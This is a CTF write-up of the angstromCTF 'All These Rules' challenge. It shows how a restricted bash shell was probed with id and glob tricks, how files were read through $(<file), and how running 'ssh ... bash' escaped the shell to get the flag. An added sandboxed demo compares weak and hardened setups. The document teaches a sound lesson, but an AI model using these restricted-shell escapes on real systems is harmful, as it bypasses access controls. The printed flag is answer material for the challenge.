All These Rules [misc]

Clam can't do this, he can't do that, wouldn't it be nice if there were something that he could do?

ssh chall@misc.2020.chall.actf.co -p 20209

Recon

If we log in with the ssh command, we end up in a restricted shell. We tried some default Linux commands and found that we could only use the id command.

chall@769b0ae9d585:~$ id 
uid=1000(chall) gid=1000(chall) groups=1000(chall)

We couldn't see any directory listing, but we could start id with an argument with wildcards and the error message would give us some more information. This way we found a /flag file.

chall@769b0ae9d585:~$ id /????
id: extra operand '/flag'

The next thing we tried was to use the contents of the file as input for id.

chall@769b0ae9d585:~$ id "$(</flag)"
id: '': no such user

This made us think that /flag might be a directory.

chall@769b0ae9d585:~$ id /flag/*
id: extra operand '/flag/print_flag'
Try 'id --help' for more information.

It seems we got a binary file in /flag/print_flag which would print the flag, but we couldn't run it in the restricted shell because we can't use /.

chall@769b0ae9d585:~$ /flag/print_flag
rbash: /flag/print_flag: restricted: cannot specify `/' in command names

But we could probably dump the binary by using its contents as an argument for the id command. We do this by emptying IFS first.

chall@769b0ae9d585:~$ IFS=""
chall@769b0ae9d585:~$ id $(</flag/print_flag)
rbash: warning: command substitution: ignored null byte in input

We hoped that the binary contained the flag, but no luck there. We see a string flag.txt, so that's probably the file which contains the flag. Well, let's open that file and get some points.

chall@769b0ae9d585:~$ id $(</flag/flag.txt)
rbash: /flag/flag.txt: Permission denied
uid=1000(chall) gid=1000(chall) groups=1000(chall)

So it seems we need to find a way to run the print_flag binary. We got a bit stuck here, tried to find more available commands with tab completion, but no useful command was found. Then we tried to run commands in our ssh command while connecting to the server. This somehow gave us a shell which gave us more freedom and we were able to run the print_flag command.

$ ssh chall@misc.2020.chall.actf.co -p 20209 bash 
rbash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
rbash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
bash -i
bash: cannot set terminal process group (5991): Inappropriate ioctl for device
bash: no job control in this shell
bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
chall@769b0ae9d585:~$ pwd             
/home/chall
pwd
chall@769b0ae9d585:~$ cd /flag
cd /flag
chall@769b0ae9d585:/flag$ ./print_flag
./print_flag
actf{woulnt_1t_be_n1ce_t0_jus7_h4v3_s0m3_freed0m}
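
The behaviour seen in this session, reproduced locally with bash -r as an added example (not part of the original write-up or the challenge's files): restricted bash refuses a slash in a command name, but leaves globbing, $(<file) and any shell reachable through PATH alone, which is presumably how the bash given on the ssh command line got to run. The sandbox directory, its files and the probe_* helpers are constructed for the demonstration, which assumes bash, env and mktemp are installed.

```shell
#!/bin/sh
# Added demo: restricted-bash behaviour reproduced in a throwaway sandbox.
# SANDBOX, its files and the helper names are constructed for this example.
BASH_BIN=$(command -v bash)
SANDBOX=$(mktemp -d)
trap 'rm -rf "$SANDBOX"' EXIT
mkdir "$SANDBOX/flag" "$SANDBOX/emptybin"
printf 'constructed-secret\n' > "$SANDBOX/flag/note.txt"
printf '#!/bin/sh\necho ran\n' > "$SANDBOX/flag/print_flag"
chmod +x "$SANDBOX/flag/print_flag"

# Run a snippet in restricted bash: $1 = PATH it gets, $2 = snippet, $3 = argument.
rsh() { env LC_ALL=C PATH="$1" "$BASH_BIN" -r -c "$2" _ "$3" 2>&1 || true; }

# 1. A slash in a command name is refused (the error the write-up ran into).
probe_slash() { rsh "$PATH" '"$1"/flag/print_flag' "$SANDBOX"; }
# 2. Pathname expansion is not restricted: the builtin echo lists the directory.
probe_glob() { rsh "$PATH" 'echo "$1"/flag/*' "$SANDBOX"; }
# 3. Input redirection is not restricted: $(<file) returns any readable file.
probe_read() { rsh "$PATH" 'echo "$(<"$1"/flag/note.txt)"' "$SANDBOX"; }
# 4. Weak setup: a shell found through PATH starts without the restrictions.
probe_escape_weak() { rsh "$PATH" 'bash -c "cd / && pwd"' ""; }
# 5. Hardened setup: PATH points at a directory of vetted commands only
#    (empty here), so the same attempt ends in "command not found".
probe_escape_hard() { rsh "$SANDBOX/emptybin" 'bash -c "cd / && pwd"' ""; }

for p in probe_slash probe_glob probe_read probe_escape_weak probe_escape_hard; do
  printf '%s => %s\n' "$p" "$($p)"
done
```

Probes 2 and 3 give the same result under either PATH, so what a restricted account can list and read has to be limited with file permissions, as the Permission denied on /flag/flag.txt shows.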

Flag

actf{woulnt_1t_be_n1ce_t0_jus7_h4v3_s0m3_freed0m}